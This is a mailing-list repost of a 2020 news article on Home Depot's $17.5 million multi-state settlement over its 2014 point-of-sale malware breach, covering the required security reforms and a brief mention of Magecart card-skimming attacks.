[BreachExchange] Home Depot agrees to $17.5 million settlement over 2014 data breach

Wed Nov 25 10:32:38 EST 2020

https://www.zdnet.com/article/home-depot-agrees-to-17-5m-settlement-over-2014-data-breach/

Home Depot has agreed to a $17.5 million settlement in a multi-state
investigation of a data breach suffered by the company in 2014.

Delaware Attorney-General Kathy Jennings announced the settlement on
Tuesday, in which a total of 46 states, as well as the District of
Columbia, have reached a resolution with the US retailer.

In 2014, Home Depot confirmed that a cyberattack had occurred on its
payment systems, impacting customers across the US and Canada.

Starting in April 2014 and detected in September of the same year, the
cyberattack mirrored what was also experienced by rival retailer
Target in 2013, in which point-of-sale (PoS) systems were infected
with malware designed to steal payment card data.

Approximately 40 million Home Depot customers were impacted by the PoS
malware, which remained hidden on the company's self-checkout systems
for months.

This information can be used to make fraudulent purchases online or
for the creation of clone cards, potentially leading to consumer bank
accounts being pilfered and creditworthiness becoming impacted.

Alongside the settlement, Home Depot has agreed to implement and
maintain new security practices in the future. These include employing
a chief information security officer (CISO), providing security
awareness training, and rolling out network access security
improvements, two-factor authentication (2FA) standards, and more.

"Retailers must take meaningful steps to protect consumers' credit and
debit card information from theft when they shop," said Massachusetts
AG Maura Healey. "This settlement ensures Home Depot complies with our
state's strong data security law and requires the company to take
steps to protect consumer information from illegal use or disclosure."

At the time of Home Depot's breach, online customers were not
involved. Six years on, and we now commonly see payment card
information being harvested across e-commerce websites in what is
known as Magecart attacks.

Instead of infiltrating corporate networks in order to strike PoS
systems, Magecart operators exploit vulnerabilities in online
platforms and deploy JavaScript code able to skim and steal payment
information submitted by customers when they make a purchase.